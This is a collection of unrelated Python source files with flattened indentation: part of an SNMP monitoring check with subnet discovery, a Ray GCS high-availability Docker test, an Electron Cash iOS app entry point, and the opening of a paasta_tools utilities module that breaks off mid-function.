CounterBasedGauge64.__name__,
snmp_type.Integer.__name__,
snmp_type.Integer32.__name__,
]
)
DEFAULT_OID_BATCH_SIZE = 10
def reply_invalid(oid):
return noSuchInstance.isSameTypeWith(oid) or noSuchObject.isSameTypeWith(oid)
class SnmpCheck(AgentCheck):
SC_STATUS = 'snmp.can_check'
_running = True
_thread = None
_NON_REPEATERS = 0
_MAX_REPETITIONS = 25
def __init__(self, name, init_config, instances):
super(SnmpCheck, self).__init__(name, init_config, instances)
# Set OID batch size
self.oid_batch_size = int(init_config.get('oid_batch_size', DEFAULT_OID_BATCH_SIZE))
# Load Custom MIB directory
self.mibs_path = init_config.get('mibs_folder')
self.ignore_nonincreasing_oid = is_affirmative(init_config.get('ignore_nonincreasing_oid', False))
self.profiles = init_config.get('profiles', {})
self.profiles_by_oid = {}
confd = get_config('confd_path')
for profile, profile_data in self.profiles.items():
filename = profile_data.get('definition_file')
if filename:
if not os.path.isabs(filename):
filename = os.path.join(confd, 'snmp.d', 'profiles', filename)
try:
with open(filename) as f:
data = yaml.safe_load(f)
except Exception:
raise ConfigurationError("Couldn't read profile '{}' in '{}'".format(profile, filename))
else:
data = profile_data['definition']
self.profiles[profile] = {'definition': data}
sys_object_oid = data.get('sysobjectid')
if sys_object_oid:
self.profiles_by_oid[sys_object_oid] = profile
self.instance['name'] = self._get_instance_key(self.instance)
self._config = self._build_config(self.instance)
def _build_config(self, instance):
return InstanceConfig(
instance,
self.warning,
self.log,
self.init_config.get('global_metrics', []),
self.mibs_path,
self.profiles,
self.profiles_by_oid,
)
def _get_instance_key(self, instance):
key = instance.get('name')
if key:
return key
ip = instance.get('ip_address')
port = instance.get('port')
if ip and port:
key = '{host}:{port}'.format(host=ip, port=port)
else:
key = ip
return key
def discover_instances(self):
config = self._config
discovery_interval = config.instance.get('discovery_interval', 3600)
while self._running:
start_time = time.time()
for host in config.ip_network.hosts():
host = str(host)
if host in config.discovered_instances:
continue
instance = config.instance.copy()
instance.pop('network_address')
instance['ip_address'] = host
host_config = self._build_config(instance)
try:
sys_object_oid = self.fetch_sysobject_oid(host_config)
except Exception as e:
self.log.debug("Error scanning host %s: %s", host, e)
continue
try:
profile = self._profile_for_sysobject_oid(sys_object_oid)
except ConfigurationError:
if not (host_config.table_oids or host_config.raw_oids):
self.log.warn("Host %s didn't match a profile for sysObjectID %s", host, sys_object_oid)
continue
else:
host_config.refresh_with_profile(self.profiles[profile], self.warning, self.log)
config.discovered_instances[host] = host_config
write_persistent_cache(self.check_id, json.dumps(list(config.discovered_instances)))
time_elapsed = time.time() - start_time
if discovery_interval - time_elapsed > 0:
time.sleep(discovery_interval - time_elapsed)
def raise_on_error_indication(self, error_indication, ip_address):
if error_indication:
message = '{} for instance {}'.format(error_indication, ip_address)
raise CheckException(message)
def check_table(self, config, table_oids):
"""
Perform a snmpwalk on the domain specified by the oids, on the device
configured in instance.
Returns a dictionary:
dict[oid/metric_name][row index] = value
In case of scalar objects, the row index is just 0
"""
results = defaultdict(dict)
enforce_constraints = config.enforce_constraints
oids = []
bulk_oids = []
# Use bulk requests for SNMP version > 1 when there are enough symbols
bulk_limit = config.bulk_threshold if config.auth_data.mpModel else 0
for table, symbols in table_oids.items():
if not symbols:
# No table to browse, just one symbol
oids.append(table)
elif len(symbols) < bulk_limit:
oids.extend(symbols)
else:
bulk_oids.append(table)
all_binds, error = self.fetch_oids(config, oids, enforce_constraints=enforce_constraints)
for oid in bulk_oids:
try:
self.log.debug('Running SNMP command getBulk on OID %r', oid)
binds_iterator = config.call_cmd(
hlapi.bulkCmd,
self._NON_REPEATERS,
self._MAX_REPETITIONS,
oid,
lookupMib=enforce_constraints,
ignoreNonIncreasingOid=self.ignore_nonincreasing_oid,
lexicographicMode=False,
)
binds, error = self._consume_binds_iterator(binds_iterator, config)
all_binds.extend(binds)
except PySnmpError as e:
message = 'Failed to collect some metrics: {}'.format(e)
if not error:
error = message
self.warning(message)
for result_oid, value in all_binds:
if not enforce_constraints:
# if enforce_constraints is false, then MIB resolution has not been done yet
# so we need to do it manually. We have to specify the mibs that we will need
# to resolve the name.
oid_to_resolve = hlapi.ObjectIdentity(result_oid.asTuple()).loadMibs(*config.mibs_to_load)
result_oid = oid_to_resolve.resolveWithMib(config.mib_view_controller)
_, metric, indexes = result_oid.getMibSymbol()
results[metric][indexes] = value
self.log.debug('Raw results: %s', results)
# Freeze the result
results.default_factory = None
return results, error
def check_raw(self, config, oids):
"""
Perform a snmpwalk on the domain specified by the oids, on the device
configured in instance.
Returns a dictionary:
dict[oid] = value, where the oid key is the dotted-string form of the OID
"""
all_binds, error = self.fetch_oids(config, oids, enforce_constraints=False)
results = {}
for result_oid, value in all_binds:
oid = result_oid.asTuple()
matching = '.'.join(str(i) for i in oid)
results[matching] = value
self.log.debug('Raw results: %s', results)
return results, error
def fetch_oids(self, config, oids, enforce_constraints):
# UPDATE: We used to perform only a snmpgetnext command to fetch metric values.
# It returns the wrong value when the OID passed is referring to a specific leaf.
# For example:
# snmpgetnext -v2c -c public localhost:11111 1.3.6.1.2.1.25.4.2.1.7.222
# iso.3.6.1.2.1.25.4.2.1.7.224 = INTEGER: 2
# SOLUTION: perform a snmpget command and fallback with snmpgetnext if not found
error = None
first_oid = 0
all_binds = []
while first_oid < len(oids):
try:
oids_batch = oids[first_oid : first_oid + self.oid_batch_size]
self.log.debug('Running SNMP command get on OIDS %s', oids_batch)
error_indication, error_status, _, var_binds = next(
config.call_cmd(hlapi.getCmd, *oids_batch, lookupMib=enforce_constraints)
)
self.log.debug('Returned vars: %s', var_binds)
self.raise_on_error_indication(error_indication, config.ip_address)
missing_results = []
for var in var_binds:
result_oid, value = var
if reply_invalid(value):
oid_tuple = result_oid.asTuple()
missing_results.append(hlapi.ObjectType(hlapi.ObjectIdentity(oid_tuple)))
else:
all_binds.append(var)
if missing_results:
# If we didn't catch the metric using snmpget, try snmpnext
# Don't walk through the entire MIB, stop at end of table
self.log.debug('Running SNMP command getNext on OIDS %s', missing_results)
binds_iterator = config.call_cmd(
hlapi.nextCmd,
*missing_results,
lookupMib=enforce_constraints,
ignoreNonIncreasingOid=self.ignore_nonincreasing_oid,
lexicographicMode=False
)
binds, error = self._consume_binds_iterator(binds_iterator, config)
all_binds.extend(binds)
except PySnmpError as e:
message = 'Failed to collect some metrics: {}'.format(e)
if not error:
error = message
self.warning(message)
# if we fail move onto next batch
first_oid += self.oid_batch_size
return all_binds, error
def fetch_sysobject_oid(self, config):
"""Return the sysObjectID of the instance."""
# Reference sysObjectID directly, see http://oidref.com/1.3.6.1.2.1.1.2
oid = hlapi.ObjectType(hlapi.ObjectIdentity((1, 3, 6, 1, 2, 1, 1, 2)))
self.log.debug('Running SNMP command on OID %r', oid)
error_indication, _, _, var_binds = next(config.call_cmd(hlapi.nextCmd, oid, lookupMib=False))
self.raise_on_error_indication(error_indication, config.ip_address)
self.log.debug('Returned vars: %s', var_binds)
return var_binds[0][1].prettyPrint()
def _profile_for_sysobject_oid(self, sys_object_oid):
"""Return, if any, a matching profile for sys_object_oid.
If several profiles match, it will return the longest match, i.e. the
closest one to the sys_object_oid.
"""
oids = [oid for oid in self.profiles_by_oid if fnmatch.fnmatch(sys_object_oid, oid)]
oids.sort()
if not oids:
raise ConfigurationError('No profile matching sysObjectID {}'.format(sys_object_oid))
return self.profiles_by_oid[oids[-1]]
def _consume_binds_iterator(self, binds_iterator, config):
all_binds = []
error = None
for error_indication, error_status, _, var_binds_table in binds_iterator:
self.log.debug('Returned vars: %s', var_binds_table)
self.raise_on_error_indication(error_indication, config.ip_address)
if error_status:
message = '{} for instance {}'.format(error_status.prettyPrint(), config.ip_address)
error = message
# submit CRITICAL service check if we can't connect to device
if 'unknownUserName' in message:
self.log.error(message)
else:
self.warning(message)
all_binds.extend(var_binds_table)
return all_binds, error
def _start_discovery(self):
cache = read_persistent_cache(self.check_id)
if cache:
hosts = json.loads(cache)
for host in hosts:
try:
ipaddress.ip_address(host)
except ValueError:
write_persistent_cache(self.check_id, json.dumps([]))
break
instance = self.instance.copy()
instance.pop('network_address')
instance['ip_address'] = host
host_config = self._build_config(instance)
self._config.discovered_instances[host] = host_config
self._thread = threading.Thread(target=self.discover_instances, name=self.name)
self._thread.daemon = True
self._thread.start()
def check(self, instance):
"""
Perform two series of SNMP requests, one for all that have MIB associated
and should be looked up and one for those specified by oids.
"""
config = self._config
if self._config.ip_network:
if self._thread is None:
self._start_discovery()
for host, discovered in list(config.discovered_instances.items()):
if self._check_with_config(discovered):
config.failing_instances[host] += 1
if config.failing_instances[host] >= config.allowed_failures:
# Remove it from discovered instances, we'll re-discover it later if it reappears
config.discovered_instances.pop(host)
# Reset the failure counter as well
config.failing_instances.pop(host)
else:
# Reset the counter if it's not failing
config.failing_instances.pop(host, None)
tags = ['network:{}'.format(self._config.ip_network)]
tags.extend(config.tags)
self.gauge('snmp.discovered_devices_count', len(config.discovered_instances), tags=tags)
else:
self._check_with_config(config)
def _check_with_config(self, config):
# Reset errors
instance = config.instance
error = table_results = raw_results = None
try:
if not (config.table_oids or config.raw_oids):
sys_object_oid = self.fetch_sysobject_oid(config)
profile = self._profile_for_sysobject_oid(sys_object_oid)
config.refresh_with_profile(self.profiles[profile], self.warning, self.log)
if config.table_oids:
self.log.debug('Querying device %s for %s oids', config.ip_address, len(config.table_oids))
table_results, error = self.check_table(config, config.table_oids)
self.report_table_metrics(config.metrics, table_results, config.tags)
if config.raw_oids:
self.log.debug('Querying device %s for %s oids', config.ip_address, len(config.raw_oids))
raw_results, error = self.check_raw(config, config.raw_oids)
self.report_raw_metrics(config.metrics, raw_results, config.tags)
except CheckException as e:
error = str(e)
self.warning(error)
except Exception as e:
if not error:
error = 'Failed to collect metrics for {} - {}'.format(instance['name'], e)
self.warning(error)
finally:
# Report service checks
sc_tags = ['snmp_device:{}'.format(instance['ip_address'])]
sc_tags.extend(instance.get('tags', []))
status = self.OK
if error:
status = self.CRITICAL
if raw_results or table_results:
status = self.WARNING
self.service_check(self.SC_STATUS, status, tags=sc_tags, message=error)
return error
def report_raw_metrics(self, metrics, results, tags):
"""
For all the metrics that are specified as oid,
the conf oid is going to exactly match or be a prefix of the oid sent back by the device
Use the instance configuration to find the name to give to the metric
Submit the results to the aggregator.
"""
for metric in metrics:
if 'OID' in metric:
forced_type = metric.get('forced_type')
queried_oid = metric['OID'].lstrip('.')
if queried_oid in results:
value = results[queried_oid]
else:
for oid in results:
if oid.startswith(queried_oid):
value = results[oid]
break
else:
self.log.warning('No matching results found for oid %s', queried_oid)
continue
name = metric.get('name', 'unnamed_metric')
metric_tags = tags
if metric.get('metric_tags'):
metric_tags = metric_tags + metric.get('metric_tags')
self.submit_metric(name, value, forced_type, metric_tags)
def report_table_metrics(self, metrics, results, tags):
"""
For each of the metrics specified as needing to be resolved with mib,
gather the tags requested in the instance conf for each row.
Submit the results to the aggregator.
"""
for metric in metrics:
forced_type = metric.get('forced_type')
if 'table' in metric:
index_based_tags = []
column_based_tags = []
for metric_tag in metric.get('metric_tags', []):
tag_key = metric_tag['tag']
if 'index' in metric_tag:
index_based_tags.append((tag_key, metric_tag.get('index')))
elif 'column' in metric_tag:
column_based_tags.append((tag_key, metric_tag.get('column')))
else:
self.log.warning('No indication on what value to use for this tag')
for value_to_collect in metric.get('symbols', []):
if value_to_collect not in results:
self.log.debug('Ignoring metric %s from table %s', value_to_collect, metric['table'])
continue
for index, val in iteritems(results[value_to_collect]):
metric_tags = tags + self.get_index_tags(index, results, index_based_tags, column_based_tags)
self.submit_metric(value_to_collect, val, forced_type, metric_tags)
elif 'symbol' in metric:
name = metric['symbol']
if name not in results:
self.log.debug('Ignoring metric %s', name)
continue
result = list(results[name].items())
if len(result) > 1:
self.log.warning('Several rows returned while the metric is supposed to be a scalar')
continue
val = result[0][1]
metric_tags = tags + metric.get('metric_tags', [])
self.submit_metric(name, val, forced_type, metric_tags)
elif 'OID' in metric:
pass # This one is already handled by the other batch of requests
else:
raise ConfigurationError('Unsupported metric in config file: {}'.format(metric))
def get_index_tags(self, index, results, index_tags, column_tags):
"""
Gather the tags for this row of the table (index) based on the
results (all the results from the query).
index_tags and column_tags are the tags to gather.
- Those specified in index_tags contain the tag_group name and the
index of the value we want to extract from the index tuple.
cf. 1 for ipVersion in the IP-MIB::ipSystemStatsTable for example
- Those specified in column_tags contain the name of a column, which
could be a potential result, to use as a tag
cf. ifDescr in the IF-MIB::ifTable for example
"""
tags = []
for idx_tag in index_tags:
tag_group = idx_tag[0]
try:
tag_value = index[idx_tag[1] - 1].prettyPrint()
except IndexError:
self.log.warning('Not enough indexes, skipping this tag')
continue
tags.append('{}:{}'.format(tag_group, tag_value))
for col_tag in column_tags:
tag_group = col_tag[0]
try:
tag_value = results[col_tag[1]][index]
except KeyError:
self.log.warning('Column %s not present in the table, skipping this tag', col_tag[1])
continue
if reply_invalid(tag_value):
self.log.warning("Can't deduct tag from column for tag %s", tag_group)
continue
tag_value = tag_value.prettyPrint()
tags.append('{}:{}'.format(tag_group, tag_value))
return tags
def submit_metric(self, name, snmp_value, forced_type, tags=None):
"""
Convert the values reported as pysnmp-Managed Objects to values and
report them to the aggregator.
"""
tags = [] if tags is None else tags
if reply_invalid(snmp_value):
# Metrics not present in the queried object
self.log.warning('No such Mib available: %s', name)
return
metric_name = self.normalize(name, prefix='snmp')
if forced_type:
if forced_type.lower() == 'gauge':
value = int(snmp_value)
self.gauge(metric_name, value, tags)
elif forced_type.lower() == 'percent':
value = total_time_to_temporal_percent(int(snmp_value), scale=1)
self.rate(metric_name, value, tags)
elif forced_type.lower() == 'counter':
value = int(snmp_value)
self.rate(metric_name, value, tags)
elif forced_type.lower() == 'monotonic_count':
value = int(snmp_value)
self.monotonic_count(metric_name, value, tags)
else:
self.warning('Invalid forced-type specified: {} in {}'.format(forced_type, name))
raise ConfigurationError('Invalid forced-type in config file: {}'.format(name))
return
# Ugly hack but couldn't find a cleaner way
# Proper way would be to use the ASN1 method isSameTypeWith but it
# wrongfully returns True in the case of CounterBasedGauge64
# and Counter64 for example
snmp_class = snmp_value.__class__.__name__
if snmp_class in SNMP_COUNTERS:
value = int(snmp_value)
self.rate(metric_name, value, tags)
return
if snmp_class in SNMP_GAUGES:
value = int(snmp_value)
self.gauge(metric_name, value, tags)
return
if snmp_class == 'Opaque':
# Try support for floats
try:
value = float(decoder.decode(bytes(snmp_value))[0])
except Exception:
pass
else:
self.gauge(metric_name, value, tags)
return
# Falls back to try to cast the value.
try:
value = float(snmp_value)
except ValueError:
pass
else:
self.gauge(metric_name, value, tags)
return
self.log.warning('Unsupported metric type %s for %s', snmp_class, metric_name)
|
test_gcs_ha_e2e.py
|
import pytest
import sys
import threading
from time import sleep
from pytest_docker_tools import container, fetch, network
from pytest_docker_tools import wrappers
from http.client import HTTPConnection
class Container(wrappers.Container):
def ready(self):
self._container.reload()
if self.status == "exited":
from pytest_docker_tools.exceptions import ContainerFailed
raise ContainerFailed(
self,
f"Container {self.name} has already exited before "
"we noticed it was ready",
)
if self.status != "running":
return False
networks = self._container.attrs["NetworkSettings"]["Networks"]
for (_, n) in networks.items():
if not n["IPAddress"]:
return False
if "Ray runtime started" in super().logs():
return True
return False
def client(self):
port = self.ports["8000/tcp"][0]
return HTTPConnection(f"localhost:{port}")
gcs_network = network(driver="bridge")
redis_image = fetch(repository="redis:latest")
redis = container(
image="{redis_image.id}",
network="{gcs_network.name}",
command=(
"redis-server --save 60 1 --loglevel" " warning --requirepass 5241590000000000"
),
)
header_node = container(
image="ray_ci:v1",
name="gcs",
network="{gcs_network.name}",
command=["ray", "start", "--head", "--block", "--num-cpus", "0"],
environment={"RAY_REDIS_ADDRESS": "{redis.ips.primary}:6379"},
wrapper_class=Container,
ports={
"8000/tcp": None,
},
)
worker_node = container(
image="ray_ci:v1",
network="{gcs_network.name}",
command=["ray", "start", "--address", "gcs:6379", "--block"],
environment={"RAY_REDIS_ADDRESS": "{redis.ips.primary}:6379"},
wrapper_class=Container,
ports={
"8000/tcp": None,
},
)
@pytest.fixture
def docker_cluster(header_node, worker_node):
yield (header_node, worker_node)
scripts = """
import ray
import json
from fastapi import FastAPI
app = FastAPI()
from ray import serve
ray.init(address="auto", namespace="g")
@serve.deployment(name="Counter", route_prefix="/api", version="v1")
@serve.ingress(app)
class Counter:
def __init__(self):
self.count = 0
@app.get("/")
def get(self):
return {{"count": self.count}}
@app.get("/incr")
def incr(self):
self.count += 1
return {{"count": self.count}}
@app.get("/decr")
def decr(self):
self.count -= 1
return {{"count": self.count}}
@app.get("/pid")
def pid(self):
import os
return {{"pid": os.getpid()}}
serve.start(detached=True, dedicated_cpu=True)
Counter.options(num_replicas={num_replicas}).deploy()
"""
check_script = """
import requests
import json
if {num_replicas} == 1:
b = json.loads(requests.get("http://127.0.0.1:8000/api/").text)["count"]
for i in range(5):
response = requests.get("http://127.0.0.1:8000/api/incr")
assert json.loads(response.text) == {{"count": i + b + 1}}
pids = {{
json.loads(requests.get("http://127.0.0.1:8000/api/pid").text)["pid"]
for _ in range(5)
}}
print(pids)
assert len(pids) == {num_replicas}
"""
@pytest.mark.skipif(sys.platform != "linux", reason="Only works on linux.")
def test_ray_server_basic(docker_cluster):
# This test covers the basic cases for gcs ha (serve ha)
# - It starts the serve on worker nodes.
# - Check the deployment is OK
# - Stop headnode
# - Check the serve app is running healthy
# - Start a reconfig (2 replicas) and it'll hang
# - Start head node. The script will continue once GCS is back
# - Make sure two replicas are there
# TODO(iycheng): Update serve to better integrate with GCS HA:
# - Make sure no task can run in the raylet where GCS is deployed.
header, worker = docker_cluster
output = worker.exec_run(cmd=f"python -c '{scripts.format(num_replicas=1)}'")
assert output.exit_code == 0
assert b"Adding 1 replicas to deployment 'Counter'." in output.output
# somehow this is not working and the port is not exposed to the host.
# worker_cli = worker.client()
# print(worker_cli.request("GET", "/api/incr"))
output = worker.exec_run(cmd=f"python -c '{check_script.format(num_replicas=1)}'")
assert output.exit_code == 0
# Kill the head node
header.kill()
# Make sure serve is still working
output = worker.exec_run(cmd=f"python -c '{check_script.format(num_replicas=1)}'")
assert output.exit_code == 0
# Script is running on another thread so that it won't block the main thread.
def reconfig():
worker.exec_run(cmd=f"python -c '{scripts.format(num_replicas=2)}'")
t = threading.Thread(target=reconfig)
t.start()
# make sure the script started
sleep(5)
# serve reconfig should continue once GCS is back
header.restart()
t.join()
output = worker.exec_run(cmd=f"python -c '{check_script.format(num_replicas=2)}'")
assert output.exit_code == 0
if __name__ == "__main__":
sys.exit(pytest.main(["-vs", __file__]))
|
app.py
|
#
# This file is:
# Copyright (C) 2018 Calin Culianu <calin.culianu@gmail.com>
#
# MIT License
#
import os
from electroncash_gui.ios_native.monkeypatches import MonkeyPatches
from electroncash.util import set_verbosity
from electroncash_gui.ios_native import ElectrumGui
from electroncash_gui.ios_native.utils import call_later, get_user_dir, cleanup_tmp_dir, is_debug_build, NSLogSuppress, NSLog
from electroncash.simple_config import SimpleConfig
# NB: This is called from appdelegate.py "application_didFinishLaunchingWithOptions_"
def main():
cleanup_tmp_dir()
config_options = {
'verbose': is_debug_build(),
'cmd': 'gui',
'gui': 'ios_native',
'cwd': os.getcwd(),
'whitelist_servers_only' : True, # on iOS we force only the whitelist ('preferred') servers for now as a security measure
}
set_verbosity(config_options.get('verbose'), timestamps=False, thread_id=False)
NSLogSuppress(not config_options.get('verbose'))
MonkeyPatches.patch()
config = SimpleConfig(config_options, read_user_dir_function = get_user_dir)
gui = ElectrumGui(config)
call_later(0.010, gui.main) # this is required for the activity indicator to actually animate. Switch to a direct call if not using activity indicator on Splash2
_printStats(config_options) # Prints some startup/debug stats such as Python version and SSL version (this is done in another thread to hopefully not impact startup overhead too much, as importing ssl may be a bit heavy)
return "Bitcoin Cash FTW!"
def _printStats(config_options):
import threading
def thrdfunc(config_options):
# lazy init of SSL
import ssl, sys
from electroncash import version
NSLog("DeLight lib version: %s (using server protocol: %s)", version.PACKAGE_VERSION, version.PROTOCOL_VERSION)
NSLog("Python version: %s", ' '.join(sys.version.split('\n')))
NSLog("OpenSSL version: %s", ssl.OPENSSL_VERSION)
#NSLog("Environment Vars:")
#for k,v in os.environ.copy().items():
# NSLog("%s=%s", str(k), str(v))
#NSLog("Config Vars:")
#for k,v in config_options.copy().items():
# NSLog("config[%s] = %s", str(k), str(v))
# /
# We do this from a thread so as to not delay app startup by importing more stuff we don't strictly need.
threading.Thread(target=thrdfunc, args=(config_options,), daemon=True).start()
|
utils.py
|
# Copyright 2015-2017 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import copy
import datetime
import difflib
import errno
import fcntl
import getpass
import glob
import hashlib
import io
import json
import logging
import math
import os
import pwd
import queue
import re
import shlex
import signal
import socket
import ssl
import sys
import tempfile
import threading
import time
import warnings
from collections import OrderedDict
from enum import Enum
from fnmatch import fnmatch
from functools import lru_cache
from functools import wraps
from subprocess import PIPE
from subprocess import Popen
from subprocess import STDOUT
from types import FrameType
from typing import Any
from typing import Callable
from typing import cast
from typing import Collection
from typing import ContextManager
from typing import Dict
from typing import FrozenSet
from typing import IO
from typing import Iterable
from typing import Iterator
from typing import List
from typing import Mapping
from typing import Optional
from typing import Sequence
from typing import Set
from typing import Tuple
from typing import Type
from typing import TypeVar
from typing import Union
import choice
import dateutil.tz
import ldap3
import requests_cache
import service_configuration_lib
from docker import Client
from docker.utils import kwargs_from_env
from kazoo.client import KazooClient
from mypy_extensions import TypedDict
from service_configuration_lib import read_service_configuration
import paasta_tools.cli.fsm
# DO NOT CHANGE SPACER, UNLESS YOU'RE PREPARED TO CHANGE ALL INSTANCES
# OF IT IN OTHER LIBRARIES (i.e. service_configuration_lib).
# It's used to compose a job's full ID from its name and instance
SPACER = "."
INFRA_ZK_PATH = "/nail/etc/zookeeper_discovery/infrastructure/"
PATH_TO_SYSTEM_PAASTA_CONFIG_DIR = os.environ.get(
"PAASTA_SYSTEM_CONFIG_DIR", "/etc/paasta/"
)
DEFAULT_SOA_DIR = service_configuration_lib.DEFAULT_SOA_DIR
AUTO_SOACONFIG_SUBDIR = "autotuned_defaults"
DEFAULT_DOCKERCFG_LOCATION = "file:///root/.dockercfg"
DEPLOY_PIPELINE_NON_DEPLOY_STEPS = (
"itest",
"itest-and-push-to-registry",
"security-check",
"performance-check",
"push-to-registry",
)
# Default values for _log
ANY_CLUSTER = "N/A"
ANY_INSTANCE = "N/A"
DEFAULT_LOGLEVEL = "event"
no_escape = re.compile(r"\x1B\[[0-9;]*[mK]")
# instead of the convention of using underscores in this scribe channel name,
# the audit log uses dashes to prevent collisions with a service that might be
# named 'audit_log'
AUDIT_LOG_STREAM = "stream_paasta-audit-log"
DEFAULT_SYNAPSE_HAPROXY_URL_FORMAT = (
"http://{host:s}:{port:d}/;csv;norefresh;scope={scope:s}"
)
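# e.g. formatted with host="localhost", port=3212, scope="example_service.main"
# this becomes "http://localhost:3212/;csv;norefresh;scope=example_service.main"
# (values here are illustrative only).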
DEFAULT_CPU_PERIOD = 100000
DEFAULT_CPU_BURST_ADD = 1
DEFAULT_SOA_CONFIGS_GIT_URL = "sysgit.yelpcorp.com"
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
INSTANCE_TYPES = (
"marathon",
"paasta_native",
"adhoc",
"kubernetes",
"tron",
"flink",
"cassandracluster",
"kafkacluster",
"monkrelays",
"nrtsearchservice",
)
INSTANCE_TYPE_TO_K8S_NAMESPACE = {
"marathon": "paasta",
"adhoc": "paasta",
"kubernetes": "paasta",
"tron": "tron",
"flink": "paasta-flinks",
"cassandracluster": "paasta-cassandraclusters",
"kafkacluster": "paasta-kafkaclusters",
"nrtsearchservice": "paasta-nrtsearchservices",
}
CAPS_DROP = [
"SETPCAP",
"MKNOD",
"AUDIT_WRITE",
"CHOWN",
"NET_RAW",
"DAC_OVERRIDE",
"FOWNER",
"FSETID",
"KILL",
"SETGID",
"SETUID",
"NET_BIND_SERVICE",
"SYS_CHROOT",
"SETFCAP",
]
class RollbackTypes(Enum):
AUTOMATIC_SLO_ROLLBACK = "automatic_slo_rollback"
USER_INITIATED_ROLLBACK = "user_initiated_rollback"
class TimeCacheEntry(TypedDict):
data: Any
fetch_time: float
_CacheRetT = TypeVar("_CacheRetT")
class time_cache:
def __init__(self, ttl: float = 0) -> None:
self.configs: Dict[Tuple, TimeCacheEntry] = {}
self.ttl = ttl
def __call__(self, f: Callable[..., _CacheRetT]) -> Callable[..., _CacheRetT]:
def cache(*args: Any, **kwargs: Any) -> _CacheRetT:
if "ttl" in kwargs:
ttl = kwargs["ttl"]
del kwargs["ttl"]
else:
ttl = self.ttl
key = args
for item in kwargs.items():
key += item
if (
(not ttl)
or (key not in self.configs)
or (time.time() - self.configs[key]["fetch_time"] > ttl)
):
self.configs[key] = {
"data": f(*args, **kwargs),
"fetch_time": time.time(),
}
return self.configs[key]["data"]
return cache
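# Illustrative usage (hypothetical function name):
#   @time_cache(ttl=30)
#   def load_remote_config(path): ...
# Repeated calls with the same arguments within 30s return the cached value;
# passing ttl=0 at call time forces a refresh.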
_SortDictsT = TypeVar("_SortDictsT", bound=Mapping)
def sort_dicts(dcts: Iterable[_SortDictsT]) -> List[_SortDictsT]:
def key(dct: _SortDictsT) -> Tuple:
return tuple(sorted(dct.items()))
return sorted(dcts, key=key)
class InvalidInstanceConfig(Exception):
pass
DeployBlacklist = List[Tuple[str, str]]
DeployWhitelist = Optional[Tuple[str, List[str]]]
# The actual config files will have lists, since tuples are not expressible in base YAML, so we define different types
# here to represent that. The getter functions will convert to the safe versions above.
UnsafeDeployBlacklist = Optional[Sequence[Sequence[str]]]
UnsafeDeployWhitelist = Optional[Sequence[Union[str, Sequence[str]]]]
Constraint = Sequence[str]
# e.g. ['GROUP_BY', 'habitat', 2]. Marathon doesn't like that so we'll convert to Constraint later.
UnstringifiedConstraint = Sequence[Union[str, int, float]]
SecurityConfigDict = Dict # Todo: define me.
class VolumeWithMode(TypedDict):
mode: str
class DockerVolume(VolumeWithMode):
hostPath: str
containerPath: str
class AwsEbsVolume(VolumeWithMode):
volume_id: str
fs_type: str
partition: int
container_path: str
class PersistentVolume(VolumeWithMode):
size: int
container_path: str
storage_class_name: str
class SecretVolumeItem(TypedDict, total=False):
key: str
path: str
mode: Union[str, int]
class SecretVolume(TypedDict, total=False):
secret_name: str
container_path: str
default_mode: Union[str, int]
items: List[SecretVolumeItem]
class MonitoringDict(TypedDict, total=False):
alert_after: Union[str, float]
check_every: str
check_oom_events: bool
component: str
description: str
notification_email: Union[str, bool]
page: bool
priority: str
project: str
realert_every: float
runbook: str
slack_channels: Union[str, List[str]]
tags: List[str]
team: str
ticket: bool
tip: str
class InstanceConfigDict(TypedDict, total=False):
deploy_group: str
mem: float
cpus: float
disk: float
cmd: str
args: List[str]
cfs_period_us: float
cpu_burst_add: float
cap_add: List
env: Dict[str, str]
monitoring: MonitoringDict
deploy_blacklist: UnsafeDeployBlacklist
deploy_whitelist: UnsafeDeployWhitelist
pool: str
persistent_volumes: List[PersistentVolume]
role: str
extra_volumes: List[DockerVolume]
aws_ebs_volumes: List[AwsEbsVolume]
secret_volumes: List[SecretVolume]
security: SecurityConfigDict
dependencies_reference: str
dependencies: Dict[str, Dict]
constraints: List[UnstringifiedConstraint]
extra_constraints: List[UnstringifiedConstraint]
net: str
extra_docker_args: Dict[str, str]
gpus: int
branch: str
iam_role: str
iam_role_provider: str
class BranchDictV1(TypedDict, total=False):
docker_image: str
desired_state: str
force_bounce: Optional[str]
class BranchDictV2(TypedDict):
git_sha: str
docker_image: str
desired_state: str
force_bounce: Optional[str]
class DockerParameter(TypedDict):
key: str
value: str
def safe_deploy_blacklist(input: UnsafeDeployBlacklist) -> DeployBlacklist:
return [(t, l) for t, l in input]
def safe_deploy_whitelist(input: UnsafeDeployWhitelist) -> DeployWhitelist:
try:
location_type, allowed_values = input
return cast(str, location_type), cast(List[str], allowed_values)
except TypeError:
return None
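# Illustrative conversion into the "safe" types above (hypothetical location values,
# shown as an interactive sketch):
#
#     safe_deploy_blacklist([["region", "uswest1-prod"]])
#     # -> [("region", "uswest1-prod")]
#
#     safe_deploy_whitelist(["region", ["uswest1-prod", "usnorth1-prod"]])
#     # -> ("region", ["uswest1-prod", "usnorth1-prod"])
#
#     safe_deploy_whitelist(None)
#     # -> None (unpacking None raises TypeError, which is caught)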
# For mypy typing
InstanceConfig_T = TypeVar("InstanceConfig_T", bound="InstanceConfig")
class InstanceConfig:
config_filename_prefix: str
def __init__(
self,
cluster: str,
instance: str,
service: str,
config_dict: InstanceConfigDict,
branch_dict: Optional[BranchDictV2],
soa_dir: str = DEFAULT_SOA_DIR,
) -> None:
self.config_dict = config_dict
self.branch_dict = branch_dict
self.cluster = cluster
self.instance = instance
self.service = service
self.soa_dir = soa_dir
self._job_id = compose_job_id(service, instance)
config_interpolation_keys = ("deploy_group",)
interpolation_facts = self.__get_interpolation_facts()
for key in config_interpolation_keys:
if (
key in self.config_dict
and self.config_dict[key] is not None # type: ignore
):
self.config_dict[key] = self.config_dict[key].format( # type: ignore
**interpolation_facts
)
def __repr__(self) -> str:
return "{!s}({!r}, {!r}, {!r}, {!r}, {!r}, {!r})".format(
self.__class__.__name__,
self.service,
self.instance,
self.cluster,
self.config_dict,
self.branch_dict,
self.soa_dir,
)
def __get_interpolation_facts(self) -> Dict[str, str]:
return {
"cluster": self.cluster,
"instance": self.instance,
